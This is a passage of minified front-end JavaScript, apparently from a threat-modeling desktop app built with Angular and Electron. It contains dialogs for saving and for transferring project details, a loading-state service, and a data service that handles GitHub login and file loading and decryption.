new(e||t)(Ee(Gh),Ee(_p),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-save-dialog"]],decls:37,vars:17,consts:[["mat-dialog-title",""],["mat-dialog-content","",2,"display","grid"],[4,"ngIf"],[1,"field-width"],["matInput","","type","text","placeholder","Update",1,"field-width",3,"spellcheck","ngModel","ngModelChange","keydown.enter"],["color","primary","style","padding-bottom: 10px;",3,"ngModel","ngModelChange",4,"ngIf"],["class","field-width",4,"ngIf"],["mat-dialog-actions","",2,"float","right"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"disabled","mat-dialog-close","click",4,"ngIf"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close","click",4,"ngIf"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","",3,"formControl","errorStateMatcher"],["matSuffix",""],[3,"value"],["matInput","",3,"spellcheck","formControl","errorStateMatcher"],["color","primary",2,"padding-bottom","10px",3,"ngModel","ngModelChange"],["matInput","",1,"field-width",3,"type","ngModel","ngModelChange","keydown.enter"],["matSuffix","",3,"click"],["matSuffix","",3,"matTooltip"],["mat-button","",3,"disabled","mat-dialog-close","click"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close","click"]],template:function(e,i){1&e&&(m(0,"h1",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"div",1),s(5,"\n  "),ne(6,nOe,40,11,"ng-container",2),s(7,"\n\n  "),ne(8,cOe,29,10,"ng-container",2),s(9,"\n\n  "),m(10,"mat-form-field",3),s(11,"\n    "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n    "),m(16,"input",4),he("ngModelChange",function(r){return i.data.msg=r})("keydown.enter",function(){return i.dialogRef.close(!0)}),u(),s(17,"\n  "),u(),s(18,"\n  "),it(19,"br"),s(20,"\n  "),ne(21,lOe,3,4,"mat-checkbox",5),s(22,"\n  "),ne(23,dOe,15,9,"mat-form-field",6),s(24,"\n"),u(),s(25,"\n"),m(26,"div",7),s(27,"\n  "),m(28,"button",8),s(29),oe(30,"translate"),u(),s(31,"\n  "),ne(32,mOe,3,5,"button",9),s(33,"\n  "),ne(34,uOe,3,5,"button",10),s(35,"\n"),u(),s(36,"\n")),2&e&&(C(1),ke(re(2,11,"general.Save")),C(5),V("ngIf",i.data.newProject),C(2),V("ngIf",i.data.newConfig),C(5),ke(re(14,13,"dialog.save.CommitMsg")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.data.msg),C(5),V("ngIf",null!=i.data.removePW),C(2),V("ngIf",null==i.data.removePW),C(6),ke(re(30,15,"general.Cancel")),C(3),V("ngIf",i.data.newProject||i.data.newConfig),C(2),V("ngIf",!i.data.newProject&&!i.data.newConfig))},dependencies:[Zi,Ri,an,Ta,Ea,N4,oa,br,da,Tge,nn,un,jr,Nr,yr,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".field-width[_ngcontent-%COMP%]{width:355px}"]}),t})();var yM=de(2344);function pOe(t,a){if(1&t&&(m(0,"mat-icon",14),s(1),u()),2&t){const e=B();C(1),ke(e.GetIcon(e.SelectedProject))}}function _Oe(t,a){if(1&t&&(m(0,"mat-option",15),s(1,"\n        "),m(2,"mat-icon"),s(3),u(),s(4),u()),2&t){const e=a.$implicit,i=B();at("matTooltip",e.tooltip),V("value",e),C(3),ke(i.GetIcon(e)),C(1),ct("\n        ",e.name,"\n      ")}}function gOe(t,a){if(1&t){const e=Ye();m(0,"li"),s(1,"\n          "),m(2,"mat-checkbox",16),he("ngModelChange",function(n){return Me(be(e).$implicit.Key=n)})("ngModelChange",function(){return be(e),Me(B().UpdateAllDetails())}),s(3),oe(4,"translate"),u(),s(5,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("disabled",!i.SourceProject||null==e.Key)("ngModel",e.Key),C(1),ct("\n            ",re(4,3,e.Value),"\n          ")}}let COe=(()=>{class t{constructor(e,i,n){this.dataService=e,this.messageService=i,this.translate=n,this.AvailableProjects=[],this.Details=[],this.AllDetails=!1,this.TransferLog=null}get SourceProject(){return this.sourceProject}set SourceProject(e){this.sourceProject=e,e&&(this.TransferLog=null)}ngOnInit(){this.dataService.AvailableProjects.forEach(e=>{var i;this.AvailableProjects.push({key:e,name:e.name,tooltip:e.source==hn.GitHub?(null===(i=this.dataService.GetRepoOfFile(e))||void 0===i?void 0:i.name)+"/"+e.path:e.path})}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Participants"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.CharScope"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ObjImpact"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Assets"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ThreatSources"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ThreatIdentification"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Tags"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ExportTemplates"})}LoadProject(){const e=i=>{var n;0==(null===(n=i.Participants)||void 0===n?void 0:n.length)&&(this.Details.find(r=>"dialog.transferproject.d.Participants"==r.Value).Key=null),(null==i.GetProjectAssetGroup()||null==this.SourceProject.GetProjectAssetGroup())&&(this.Details.find(r=>"dialog.transferproject.d.Assets"==r.Value).Key=null),0==i.GetThreatSources().Sources.length&&(this.Details.find(r=>"dialog.transferproject.d.ThreatSources"==r.Value).Key=null),0==i.GetSystemThreats().length&&(this.Details.find(r=>"dialog.transferproject.d.ThreatIdentification"==r.Value).Key=null)};this.Details.forEach(i=>i.Key=!1),this.dataService.GetFile(this.SelectedProject.key).then(i=>{this.SourceProject=i,e(this.SourceProject)}).catch()}TransferProject(){this.TransferLog=this.sourceProject.Name+":\n",this.TransferLog+=this.translate.instant("dialog.transferproject.l.start")+"\n";const e=this.dataService.Project,i=this.SourceProject;this.Details.filter(n=>1==n.Key).forEach(n=>{if("dialog.transferproject.d.Participants"===n.Value)i.Participants.forEach(r=>{e.Participants.some(c=>c.Name==r.Name&&c.Email==r.Email)||(e.Participants.push({Name:r.Name,Email:r.Email}),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createParticipant")+": "+r.Name+"\n")});else if("dialog.transferproject.d.CharScope"===n.Value){const r=i.GetCharScope(),c=e.GetCharScope();r.StepProperties.forEach(d=>{r[d].forEach(T=>c[d].push(T)),r[d].length>0&&(this.TransferLog+="Update: "+this.translate.instant("pages.modeling.charscope."+d)+"\n")})}else if("dialog.transferproject.d.ObjImpact"===n.Value){const r=i.GetObjImpact(),c=e.GetObjImpact();r.StepProperties.forEach(d=>{r[d].forEach(T=>c[d].push(T)),r[d].length>0&&(this.TransferLog+="Update: "+this.translate.instant("pages.modeling.objimpact."+d)+"\n")})}else if("dialog.transferproject.d.Assets"===n.Value){const r=i.GetProjectAssetGroup(),c=e.GetProjectAssetGroup();if(r&&c){const d=(q,Y)=>{const te=e.CreateMyData(Y);te.CopyFrom(q.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createMyData")+": "+te.Name+"\n"},T=(q,Y)=>{const te=e.CreateAssetGroup(Y);te.CopyFrom(q.Data),te.Data.assetGroupIDs=[],te.Data.associatedDataIDs=[],this.TransferLog+=this.translate.instant("dialog.transferproject.l.createAsset")+": "+te.Name+"\n",q.AssociatedData.forEach(pe=>d(pe,te)),q.SubGroups.forEach(pe=>T(pe,te))},k=(q,Y)=>{q.SubGroups.forEach(te=>{Y.SubGroups.some(pe=>pe.Name===te.Name)||T(te,Y)}),q.AssociatedData.forEach(te=>{Y.AssociatedData.some(pe=>pe.Name==te.Name)||d(te,Y)}),q.SubGroups.forEach(te=>{k(te,Y.SubGroups.find(pe=>pe.Name==te.Name))})};k(r,c)}}else if("dialog.transferproject.d.ThreatSources"===n.Value){const r=i.GetThreatSources(),c=e.GetThreatSources();r.Sources.forEach(d=>{if(!c.Sources.some(T=>T.Name==d.Name)){const T=e.CreateThreatActor();T.CopyFrom(d.Data),c.AddThreatActor(T),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createThreatActor")+": "+T.Name+"\n"}})}else if("dialog.transferproject.d.ThreatIdentification"===n.Value){const r=e.GetSystemThreats();i.GetSystemThreats().forEach(c=>{if(!r.some(d=>d.Name==c.Name)){let d=this.dataService.Config.GetThreatCategory(c.ThreatCategory.ID);d||(d=this.dataService.Config.GetThreatCategories().find(Y=>Y.Name==c.ThreatCategory.Name)),d||(d=this.dataService.Config.GetThreatCategories()[0]);const T=e.CreateSystemThreat(d);T.CopyFrom(c.Data),T.ThreatCategory=d,T.Data.affectedAssetObjectIDs=[];const k=e.GetAssetGroups(),q=e.GetMyDatas();c.AffectedAssetObjects.forEach(Y=>{let te=k.find(pe=>Y.Name==pe.Name);te||(te=q.find(pe=>Y.Name==pe.Name)),te&&(T.AffectedAssetObjects=[...T.AffectedAssetObjects,te])}),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createSystemThreat")+": "+T.Name+"\n"}})}else"dialog.transferproject.d.Tags"===n.Value?i.GetMyTags().forEach(r=>{if(!e.GetMyTags().some(c=>c.Name==r.Name)){const c=e.CreateMyTag();c.CopyFrom(r.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createTag")+": "+c.Name+"\n"}}):"dialog.transferproject.d.ExportTemplates"===n.Value&&i.GetExportTemplates().forEach(r=>{if(!e.GetExportTemplates().some(c=>c.Name==r.Name)){const c=e.CreateExportTemplate();c.CopyFrom(r.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createExportTemplate")+": "+c.Name+"\n"}})}),this.Details.forEach(n=>n.Key=!1),this.UpdateAllDetails(),this.SelectedProject=null,this.SourceProject=null,this.TransferLog+=this.translate.instant("dialog.transferproject.l.finished")+"\n",this.dataService.ConsistencyCheck().then(n=>{n?this.messageService.Success("messages.success.transferedProjectDetails"):this.messageService.Warning("messages.warning.transferedProjectDetails")})}UpdateAllDetails(){this.AllDetails=this.Details.filter(e=>null!=e.Key).every(e=>e.Key)}SomeDetails(){return this.Details.filter(e=>e.Key).length>0&&!this.AllDetails}SetAll(e){this.AllDetails=e,this.Details.filter(i=>null!=i.Key).forEach(i=>i.Key=e)}GetIcon(e){return e.key.source==hn.FileSystem?"file_present":"cloud_queue"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(A2),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-transfer-project-dialog"]],decls:75,vars:36,consts:[["mat-dialog-title",""],["appearance","fill",2,"width","500px"],[3,"value","valueChange","selectionChange"],["style","vertical-align: bottom;",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["mat-raised-button","",3,"disabled","click"],["mat-raised-button","","color","primary","matTooltipShowDelay","1000",2,"margin-left","50px",3,"disabled","matTooltip","click"],[2,"margin-top","20px"],[1,"detail-list-section"],["color","primary",1,"detail-margin",3,"disabled","checked","indeterminate","change"],[4,"ngFor","ngForOf"],["matInput","","readonly","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"disabled","ngModel","ngModelChange"],["align","end"],["mat-button","","mat-dialog-close",""],[2,"vertical-align","bottom"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["color","primary",3,"disabled","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),m(6,"mat-form-field",1),s(7,"\n    "),m(8,"mat-label"),s(9),oe(10,"translate"),u(),s(11,"\n    "),m(12,"mat-select",2),he("valueChange",function(r){return i.SelectedProject=r})("selectionChange",function(){return i.SourceProject=null}),s(13,"\n      "),m(14,"mat-select-trigger"),s(15,"\n        "),ne(16,pOe,2,1,"mat-icon",3),s(17),u(),s(18,"\n      "),m(19,"mat-option"),s(20),oe(21,"translate"),u(),s(22,"\n      "),ne(23,_Oe,5,4,"mat-option",4),s(24,"\n    "),u(),s(25,"\n  "),u(),s(26,"\n  "),it(27,"br"),s(28,"\n  "),m(29,"button",5),he("click",function(){return i.LoadProject()}),s(30),oe(31,"translate"),u(),s(32,"\n  "),m(33,"button",6),he("click",function(){return i.TransferProject()}),oe(34,"translate"),s(35),oe(36,"translate"),u(),s(37,"\n  "),it(38,"br"),s(39,"\n  "),m(40,"div",7),s(41,"\n    "),m(42,"span",8),s(43,"\n      "),m(44,"mat-checkbox",9),he("change",function(r){return i.SetAll(r.checked)}),s(45),oe(46,"translate"),u(),s(47,"\n    "),u(),s(48,"\n    "),m(49,"span",8),s(50,"\n      "),m(51,"ul"),s(52,"\n        "),ne(53,gOe,6,5,"li",10),s(54,"\n      "),u(),s(55,"\n    "),u(),s(56,"\n  "),u(),s(57,"\n  "),it(58,"br"),s(59,"\n  "),m(60,"mat-form-field",1),s(61,"\n    "),m(62,"mat-label"),s(63,"Log"),u(),s(64,"\n    "),m(65,"textarea",11),he("ngModelChange",function(r){return i.TransferLog=r}),u(),s(66,"\n  "),u(),s(67,"\n"),u(),s(68,"\n"),m(69,"mat-dialog-actions",12),s(70,"\n  "),m(71,"button",13),s(72),oe(73,"translate"),u(),s(74,"\n"),u()),2&e&&(C(1),ke(re(2,20,"dialog.transferproject.title")),C(8),ke(re(10,22,"dialog.transferproject.SelectSourceProject")),C(3),V("value",i.SelectedProject),C(4),V("ngIf",i.SelectedProject),C(1),ct("\xa0",null==i.SelectedProject?null:i.SelectedProject.name,"\n      "),C(3),ke(re(21,24,"properties.selectNone")),C(3),V("ngForOf",i.AvailableProjects),C(6),V("disabled",!i.SelectedProject),C(1),ke(re(31,26,"dialog.transferproject.LoadProject")),C(3),at("matTooltip",re(34,28,"dialog.transferproject.TransferDetails.tt")),V("disabled",!i.SourceProject||!i.SomeDetails()&&!i.AllDetails),C(2),ke(re(36,30,"dialog.transferproject.TransferDetails")),C(9),V("disabled",!i.SourceProject)("checked",i.AllDetails)("indeterminate",i.SomeDetails()),C(1),ct("\n        ",re(46,32,"dialog.transferproject.Details"),"\n      "),C(8),V("ngForOf",i.Details),C(12),V("disabled",!i.TransferLog)("ngModel",i.TransferLog),C(7),ke(re(73,34,"general.Close")))},dependencies:[Zi,Ri,an,Ta,Ea,oa,br,da,nn,un,Nr,Qge,yr,Go,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".detail-section[_ngcontent-%COMP%]{margin:12px 0}.detail-margin[_ngcontent-%COMP%]{margin:0 12px}ul[_ngcontent-%COMP%]{list-style-type:none;margin-top:4px}"]}),t})();class yOe{constructor(a=!0,e=!0,i){this.value=a,this.source=e,this.unique=i}isSame(a=!0,e){return!!(a===this.source||a===this.value||this.unique&&e&&this.unique===e)}}let $G=(()=>{class t{constructor(){this.defaultKey="default",this.loadingSubjects=new Map,this.loadingStacks=new Map,this.loadingKeyIndex=new Map}isLoading$(e={}){if(Array.isArray(e.key)){if(0===e.key.length)throw new Error("Must provide at least one key when passing an array of keys");return mg(e.key.map(n=>this.isLoading$({key:n}))).pipe(Xe(n=>n.some(r=>r)),Bh())}const i=this.normalizeKeys(e.key);return new G(n=>{this.indexKeys(i);const r=this.loadingSubjects.get(i[0]).pipe(Bh()).subscribe(n);return()=>{r.unsubscribe(),i.forEach(c=>this.deIndexKey(c))}})}isLoading(e={}){return this.normalizeKeys(e.key).map(n=>{var r,c;return null!==(c=null===(r=this.loadingSubjects.get(n))||void 0===r?void 0:r.value)&&void 0!==c&&c}).some(n=>n)}add(e,i){const n=i||!(e instanceof Promise||e instanceof I||e instanceof G)&&e||void 0;let r,c;const d=k=>()=>this.remove(k,n),T=this.normalizeKeys(null==n?void 0:n.key);if(e instanceof I||e instanceof G){if(c=e,r=T.map(e instanceof G?()=>e.pipe(Cn(1)).subscribe():()=>e),r[0].closed)return e;r.forEach(k=>k.add(d(k)))}else e instanceof Promise&&(c=e,r=T.map(()=>e),r.forEach(k=>k.then(d(e),d(e))));return this.indexKeys(T),T.forEach((k,q)=>{const Y=r&&r[q],te=this.loadingStacks.get(k);if(null!=n&&n.unique){const pe=te.findIndex(Re=>Re.isSame(Y,null==n?void 0:n.unique));if(pe>=0){const Re=te.splice(pe,1)[0];Re.source instanceof G&&Re.value.unsubscribe()}}te.push(new yOe(Y,e instanceof G?e:Y,null==n?void 0:n.unique)),this.updateLoadingStatus(k)}),c}remove(e,i){let r,n=i;e instanceof I||e instanceof Promise||e instanceof G?r=e:n=e;const c=this.normalizeKeys(null==n?void 0:n.key);for(const d of c){const T=this.loadingStacks.get(d);if(!T)continue;const k=T.findIndex(Y=>Y.isSame(r));if(k<0)continue;const q=T.splice(k,1)[0];r instanceof G&&q.source===r&&q.value.unsubscribe(),this.updateLoadingStatus(d),this.deIndexKey(d)}}clear(e){const i=null!=e&&e.key?this.normalizeKeys(e.key):Array.from(this.loadingStacks.keys());for(const n of i){const r=this.loadingStacks.get(n);if(r){for(const c of r)c.source instanceof G&&c.value.unsubscribe(),this.deIndexKey(n);this.loadingStacks.has(n)&&this.loadingStacks.set(n,[]),this.updateLoadingStatus(n)}}}normalizeKeys(e){return e?Array.isArray(e)||(e=[e]):e=[this.defaultKey],e}indexKeys(e){for(const i of e)if(this.loadingKeyIndex.has(i)){const n=this.loadingKeyIndex.get(i);this.loadingKeyIndex.set(i,n+1)}else{const n=new zs(!1);this.loadingKeyIndex.set(i,1),this.loadingSubjects.set(i,n),this.loadingStacks.set(i,[])}}deIndexKey(e){const i=this.loadingKeyIndex.get(e);1===i?(this.loadingKeyIndex.delete(e),this.loadingSubjects.delete(e),this.loadingStacks.delete(e)):this.loadingKeyIndex.set(e,i-1)}updateLoadingStatus(e){var i,n,r;const d=(null!==(n=null===(i=this.loadingStacks.get(e))||void 0===i?void 0:i.length)&&void 0!==n?n:0)>0;null===(r=this.loadingSubjects.get(e))||void 0===r||r.next(d)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();new ni("SW_IS_LOADING_DIRECTIVE_CONFIG");let ST=(()=>{class t{constructor(){this.isElectron&&(this.ipcRenderer=window.require("electron").ipcRenderer,this.webFrame=window.require("electron").webFrame,this.fs=window.require("fs"),this.childProcess=window.require("child_process"),this.childProcess.exec("node -v",(e,i,n)=>{e?console.error(`error: ${e.message}`):n?console.error(`stderr: ${n}`):console.log(`stdout:\n${i}`)}))}get isElectron(){return!!(window&&window.process&&window.process.type)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var O5=de(5449).Buffer,Es=(()=>{return(t=Es||(Es={}))[t.Project=1]="Project",t[t.Config=2]="Config",Es;var t})(),hn=(()=>{return(t=hn||(hn={}))[t.Import=1]="Import",t[t.FileSystem=2]="FileSystem",t[t.GitHub=3]="GitHub",hn;var t})(),Wr=(()=>{return(t=Wr||(Wr={}))[t.None=0]="None",t[t.Guest=1]="Guest",t[t.LoggedIn=2]="LoggedIn",Wr;var t})();let Yi=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){if(this.locStorage=e,this.isLoading=i,this.http=n,this.router=r,this.clipboard=c,this.dialog=d,this.messagesService=T,this.translate=k,this.fileUpdate=q,this.zone=Y,this.electron=te,this.hasSpellCheck=null,this.userMode=Wr.None,this.repos=[],this.availableFiles=[],this.NewVersionAvailable=null,this.ProjectChanged=new Tt,this.ProjectSaved=new Tt,this.ConfigChanged=new Tt,this.isLoggingIn=!1,this.blockLoading=!1,this.checkAppVersionUpdate(),this.restoreUserAccount(),this.UserMode==Wr.None&&"true"==this.locStorage.Get(si.AUTH_GUEST)&&(this.userMode=Wr.Guest),(this.UserMode==Wr.LoggedIn||this.UserMode==Wr.Guest)&&this.retrieveRepositories(),this.Config=Wu.DefaultFile(),setTimeout(()=>{(new Rl).repos.listReleases({owner:"SecSimon",repo:"TTM"}).then(({data:Re})=>{const Fe=Re.find(Ne=>this.isNewVersion(Ne.tag_name,uf_i));Fe&&(this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.newVersion"),Fe.tag_name)),setTimeout(()=>{this.NewVersionAvailable=Fe.tag_name},1500))})},12e3),this.electron.isElectron&&this.electron.ipcRenderer){this.electron.ipcRenderer.on("oncode",(Re,Fe)=>{this.zone.run(()=>this.LogIn(Fe))}),this.electron.ipcRenderer.on("OnNew",()=>{this.zone.run(()=>this.OnNewProject())}),this.electron.ipcRenderer.on("OnSave",()=>{this.zone.run(()=>this.OnSave())}),this.electron.ipcRenderer.on("OnSaveAs",()=>{this.zone.run(()=>this.OnSave(!0))}),this.electron.ipcRenderer.on("OnLocalDownload",()=>{this.zone.run(()=>this.OnSave(null,!0))}),this.electron.ipcRenderer.on("OnCloseFile",()=>{this.zone.run(()=>this.OnCloseFile())}),this.electron.ipcRenderer.on("OnOpenFile",(Re,Fe,Ne)=>{this.zone.run(()=>{this.IsLoggedIn||this.GuestLogin(),this.OnCloseFile().then(()=>{const et=JSON.parse(Fe);this.locStorage.Remove(si.LAST_FILE),this.OnLoadFile({source:hn.FileSystem,importData:et,path:Ne,name:this.GetFileName(Ne),isEncrypted:null,type:null})})})}),this.electron.ipcRenderer.send("RendererReady");const pe=this.getLastFileHistory().filter(Re=>Re.source==hn.FileSystem);pe.length>0&&this.electron.ipcRenderer.send("ExistFiles",pe.map(Re=>Re.path)),this.electron.ipcRenderer.on("ExistFilesCallback",(Re,Fe)=>{this.zone.run(()=>{Fe.forEach(et=>this.addFileToAvailableFiles(pe.find(ut=>ut.path==et&&ut.source==hn.FileSystem)));const Ne=this.locStorage.Get(si.LAST_FILE);if(Ne){const et=JSON.parse(Ne);if(et.source==hn.FileSystem){const ut=this.AvailableFiles.find(Ze=>Ze.source==hn.FileSystem&&Ze.path==et.path);ut&&(this.IsLoggedIn||this.GuestLogin(),this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.loadFile"),ut.name)),this.OnLoadFile(ut))}}})})}}get selectedFile(){return this._selectedFile}set selectedFile(e){this._selectedFile=e,e&&this.addFileToHistory(e)}get UserMode(){return this.userMode}get IsLoggedIn(){return this.UserMode==Wr.LoggedIn}get IsGuest(){return this.UserMode==Wr.Guest}get KeepUserSignedIn(){let e=this.locStorage.Get(si.AUTH_KEEP_SIGNED_IN);return null==e?(this.locStorage.Set(si.AUTH_KEEP_SIGNED_IN,String(!0)),!0):"true"==e}set KeepUserSignedIn(e){this.locStorage.Set(si.AUTH_KEEP_SIGNED_IN,String(e))}get UserName(){return this.userName}get UserAccount(){return this.userAccount}get UserURL(){return this.userURL}get UserEmail(){return this.userEmail}get UserDisplayName(){return Gi.NullOrEmpty(this.UserName)?this.UserAccount:this.UserName}get Repos(){return this.repos}get SelectedFile(){return this.selectedFile}get SelectedGHFile(){var e;return(null===(e=this.selectedFile)||void 0===e?void 0:e.source)==hn.GitHub?this.SelectedFile:null}get SelectedFSFile(){var e;return(null===(e=this.selectedFile)||void 0===e?void 0:e.source)==hn.GitHub?this.SelectedFile:null}get AvailableFiles(){return this.availableFiles}get AvailableProjects(){return this.availableFiles.filter(e=>e.type==Es.Project)}get AvailableConfigs(){return this.availableFiles.filter(e=>e.type==Es.Config)}get AvailableFSProjects(){return this.availableFiles.filter(e=>e.source==hn.FileSystem&&e.type==Es.Project)}get AvailableFSConfigs(){return this.availableFiles.filter(e=>e.source==hn.FileSystem&&e.type==Es.Config)}get AvailableGHProjects(){return this.availableFiles.filter(e=>e.source==hn.GitHub&&e.type==Es.Project)}get AvailableGHConfigs(){return this.availableFiles.filter(e=>e.source==hn.GitHub&&e.type==Es.Config)}get HasProject(){return null!=this.Project}get Project(){return this.project}set Project(e){this.project!=e&&(e&&e.TTModelerVersion&&this.isNewVersion(e.TTModelerVersion,uf_i)&&(this.messagesService.Error(Gi.Format(this.translate.instant("messages.error.newerFileVersion"),e.TTModelerVersion)),e=null),this.project=e,e?(this.project.FileChanged=!1,e.TTModelerVersion=uf_i,this.Config=e.Config,this.Config.ProjectFile=e,this.project.DataChanged.subscribe(()=>{this.startUnsavedChangesTimer()})):this.stopUnsavedChangesTimer(),this.ProjectChanged.emit(e))}get Config(){return this.config}set Config(e){this.config=e,this.ConfigChanged.emit(e)}get CanSaveFile(){var e;return(null===(e=this.SelectedFile)||void 0===e?void 0:e.source)!=hn.GitHub||this.GetRepoOfFile(this.SelectedFile).isWritable}get CanSaveProject(){return this.CanSaveFile&&null!=this.Project}get HasUnsavedChanges(){var e;return this.Project?this.Project.FileChanged:null===(e=this.Config)||void 0===e?void 0:e.FileChanged}get HasSpellCheck(){if(null==this.hasSpellCheck){const e=this.locStorage.Get(si.SPELL_CHECK);this.hasSpellCheck="true"==e||null==e}return this.hasSpellCheck}set HasSpellCheck(e){this.hasSpellCheck=e,this.locStorage.Set(si.SPELL_CHECK,String(e))}LogIn(e){if(!this.isLoggingIn&&this.locStorage.Get(si.AUTH_LAST_CODE)!=e)try{this.isLoggingIn=!0,this.isLoading.add(),this.clearLoginData();const i={headers:new du({"Content-Type":"text/plain"}),responseType:"text"};this.http.post("https://1tvzjyylrh.execute-api.us-east-2.amazonaws.com/default/GithubAuthHandler",JSON.stringify({code:e}),i).subscribe(n=>{n.includes("access_token")?(this.accessToken=n.split("&")[0].split("=")[1],this.userMode=Wr.LoggedIn,this.KeepUserSignedIn&&(this.locStorage.Set(si.AUTH_ACCESS_TOKEN,this.accessToken),this.locStorage.Set(si.AUTH_LAST_CODE,e)),this.messagesService.Success("messages.success.githubauth"),this.retrieveUser()):this.messagesService.Error("messages.error.githubauth",n),this.isLoading.remove(),this.isLoggingIn=!1},n=>{this.messagesService.Error("messages.error.githubauth",n),this.isLoading.remove(),this.isLoggingIn=!1})}catch(i){this.messagesService.Error("messages.error.githubauth",i),this.isLoading.remove(),this.isLoggingIn=!1}}GuestLogin(){this.userMode=Wr.Guest,this.locStorage.Set(si.AUTH_GUEST,String(!0)),this.retrieveRepositories(),this.router.navigate(["/"])}LogOut(){this.OnCloseFile().then(()=>{this.clearLoginData(),this.AvailableFiles.forEach(e=>{e.source==hn.GitHub&&"SecSimon"!=this.GetRepoOfFile(e).owner&&this.removeFileFromAvailableFiles(e)}),this.messagesService.Info("messages.info.logout"),this.router.navigate(["/"])})}OnNewProject(e=null){this.isLoading.add(),this.OnCloseFile().then(()=>{this.selectedFile=null;const i=n=>{n.Data.ID=Fo();const r=new mf({},n);r.InitializeNewProject(),r.CreateDiagram(xn.DataFlow),r.Name="Project.ttmp",this.selectedFile={source:hn.Import,type:Es.Project,name:r.Name,isEncrypted:null,path:null},this.Project=r,this.locStorage.Remove(si.LAST_FILE),this.isLoading.remove()};e?this.GetFile(e).then(n=>i(n)).catch(n=>this.messagesService.Error(n)):i(Wu.DefaultFile())})}OnLoadFile(e){const i=this.locStorage.Get(si.LAST_FILE);this.OnCloseFile().then(()=>{if(e.source==hn.GitHub&&i){const n=JSON.parse(i);if(this.compareFiles(e,n)&&e.sha!=n.sha)return this.isLoading.remove(),void this.messagesService.Error("messages.error.githuboutdatedfile")}this.selectedFile=e,this.GetFile(e).then(n=>{n instanceof mf?(this.Project=n,this.messagesService.Success("messages.success.loadProject",e.name)):n&&(this.Config=n,this.Project=null,this.messagesService.Success("messages.success.loadConfig",e.name))}).catch(n=>{this.messagesService.Error(n)})})}ImportFile(e){if(e.target.files&&e.target.files[0]){const i=new FileReader,n=this.electron.isElectron?e.target.files[0].path:e.target.files[0].name;i.onload=r=>{const d=JSON.parse(i.result.toString());this.OnLoadFile({path:n,name:this.GetFileName(n),source:hn.Import,type:null,isEncrypted:null,importData:d})},i.readAsText(e.target.files[0])}}GetFile(e){return new Promise((i,n)=>{this.isLoading.add();const r=(c,d)=>{const T=(k,q)=>{if("content"in k){const te=JSON.parse(k.content);d.type=null!=te.config?Es.Project:Es.Config,d.type==Es.Project?(this.fileUpdate.UpdateProjectFile(te),te.Data.Name=d.name,i(mf.FromJSON(te))):(this.fileUpdate.UpdateConfigFile(te),te.Data.Name=d.name,i(Wu.FromJSON(te)))}else n("Unsupported file")};if("encrypted"in c){const k=(q,Y)=>{const te={pw:"",file:d.name};this.isLoading.add(),this.dialog.open(mwe,{hasBackdrop:!1,data:te}).afterClosed().subscribe(Re=>{if(Re)try{this.fileContentCrypto=new y5(te.pw),this.fileContentCrypto.Decrypt(q.encrypted),q.content=JSON.parse(this.fileContentCrypto.Decrypt(q.content)),delete q.encrypted,T(q)}catch(Fe){this.messagesService.Warning("messages.warning.wrongPassword"),k(q,Y)}finally{this.isLoading.remove()}else this.isLoading.remove()})};d.isEncrypted=!0,k(c,d)}else T(c)};if(e.importData){const c=e.importData;e.importData=null,r(c,e),this.isLoading.remove()}else e.source==hn.GitHub?(this.UserMode==Wr.LoggedIn?new Rl({auth:this.accessToken}):new Rl).git.getBlob({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,file_sha:e.sha}).then(({data:d})=>{const T=JSON.parse(O5.from(d.content,"base64").toString());r(T,e)}).catch(d=>{this.messagesService.Error("messages.error.githubfetch",d)}).finally(()=>{this.isLoading.remove()}):e.source==hn.FileSystem&&(0==this.electron.ipcRenderer.listenerCount("ReadFileCallback")&&this.electron.ipcRenderer.on("ReadFileCallback",(c,d,T)=>{this.zone.run(()=>{try{const k=JSON.parse(d);r(k,e)}catch(k){console.log(k)}finally{this.isLoading.remove()}}),this.electron.ipcRenderer.removeAllListeners("ReadFileCallback")}),this.electron.ipcRenderer.send("ReadFile",e.path))})}ReloadFile(){if(this.SelectedFile){const e=this.SelectedFile;this.OnCloseFile().then(()=>{this.OnLoadFile(e)})}}RestoreCommit(e){const i=this.UserMode==Wr.LoggedIn?new Rl({auth:this.accessToken}):new 